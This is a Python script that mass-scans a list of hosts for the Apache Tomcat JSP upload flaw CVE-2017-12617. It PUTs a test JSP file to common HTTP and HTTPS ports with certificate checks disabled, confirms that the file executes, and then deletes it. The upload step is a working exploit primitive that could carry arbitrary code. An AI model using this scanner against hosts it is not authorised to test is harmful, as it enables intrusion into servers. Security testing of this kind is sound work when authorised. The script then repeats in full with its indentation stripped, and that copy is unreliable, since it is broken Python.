klustic/CVE-2017-12617.py

## CVE-2017-12617.py
import argparse
import itertools
import logging
import requests
import sys
import threading
import urllib3


class Scanner(object):
  def __init__(self, hosts, loglevel=logging.WARNING):
    self.hosts = set(hosts)
    self.vulnerable = []
    self.path = '/dmarttest.jsp'
    self.headers = {'Connection':'close'}
    self.logger = logging.getLogger(self.__class__.__name__)
    self.logger.setLevel(loglevel)

  @staticmethod
  def gen(host):
    return list(itertools.product(['https'], [host], [443, 8443])) + list(itertools.product(['http'], [host], [80, 8080]))

  def run(self):
    for _host in self.hosts:
      for host in self.gen(_host):
        url = '{}://{}:{}'.format(*host) + self.path
        try:
          self.logger.debug('{} (PUT)...'.format(url))
          pr = requests.put(url + '/', headers=self.headers, data='<% out.println("hello");%>', timeout=2, verify=False)
        except Exception as e:
          #self.logger.debug(e)
          continue
        self.logger.debug('{} (PUT) -> {} {}'.format(url, pr.status_code, pr.reason))
        if not (200 <= pr.status_code < 300):
          continue
        try:
          self.logger.debug('{} (GET)'.format(url))
          pg = requests.get(url, headers=self.headers, verify=False)
        except Exception as e:
          #self.logger.debug(e)
          continue
        self.logger.debug('{} (GET) -> {} {}'.format(url, pr.status_code, pr.reason))
        self.logger.debug(pg.text)
        if 'hello' in pg.text:
          self.logger.warning('VULNERABLE: {}'.format(host))
          requests.delete(url+'/', headers=self.headers, verify=False)
    return

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument('list', help='Name of a file containing a list of hosts to check')
  args = parser.parse_args()

  with open(args.list) as f:
    hosts = f.read().split()
  s = Scanner(hosts, loglevel=logging.DEBUG)
  s.run()

if __name__ == '__main__':
  logging.basicConfig(level=logging.WARNING)
  logging.getLogger().addHandler(logging.FileHandler(sys.argv[0]+'.log'))
  urllib3.disable_warnings()
  main()
	import argparse
	import itertools
	import logging
	import requests
	import sys
	import threading
	import urllib3


	class Scanner(object):
	def __init__(self, hosts, loglevel=logging.WARNING):
	self.hosts = set(hosts)
	self.vulnerable = []
	self.path = '/dmarttest.jsp'
	self.headers = {'Connection':'close'}
	self.logger = logging.getLogger(self.__class__.__name__)
	self.logger.setLevel(loglevel)

	@staticmethod
	def gen(host):
	return list(itertools.product(['https'], [host], [443, 8443])) + list(itertools.product(['http'], [host], [80, 8080]))

	def run(self):
	for _host in self.hosts:
	for host in self.gen(_host):
	url = '{}://{}:{}'.format(*host) + self.path
	try:
	self.logger.debug('{} (PUT)...'.format(url))
	pr = requests.put(url + '/', headers=self.headers, data='<% out.println("hello");%>', timeout=2, verify=False)
	except Exception as e:
	#self.logger.debug(e)
	continue
	self.logger.debug('{} (PUT) -> {} {}'.format(url, pr.status_code, pr.reason))
	if not (200 <= pr.status_code < 300):
	continue
	try:
	self.logger.debug('{} (GET)'.format(url))
	pg = requests.get(url, headers=self.headers, verify=False)
	except Exception as e:
	#self.logger.debug(e)
	continue
	self.logger.debug('{} (GET) -> {} {}'.format(url, pr.status_code, pr.reason))
	self.logger.debug(pg.text)
	if 'hello' in pg.text:
	self.logger.warning('VULNERABLE: {}'.format(host))
	requests.delete(url+'/', headers=self.headers, verify=False)
	return

	def main():
	parser = argparse.ArgumentParser()
	parser.add_argument('list', help='Name of a file containing a list of hosts to check')
	args = parser.parse_args()

	with open(args.list) as f:
	hosts = f.read().split()
	s = Scanner(hosts, loglevel=logging.DEBUG)
	s.run()

	if __name__ == '__main__':
	logging.basicConfig(level=logging.WARNING)
	logging.getLogger().addHandler(logging.FileHandler(sys.argv[0]+'.log'))
	urllib3.disable_warnings()
	main()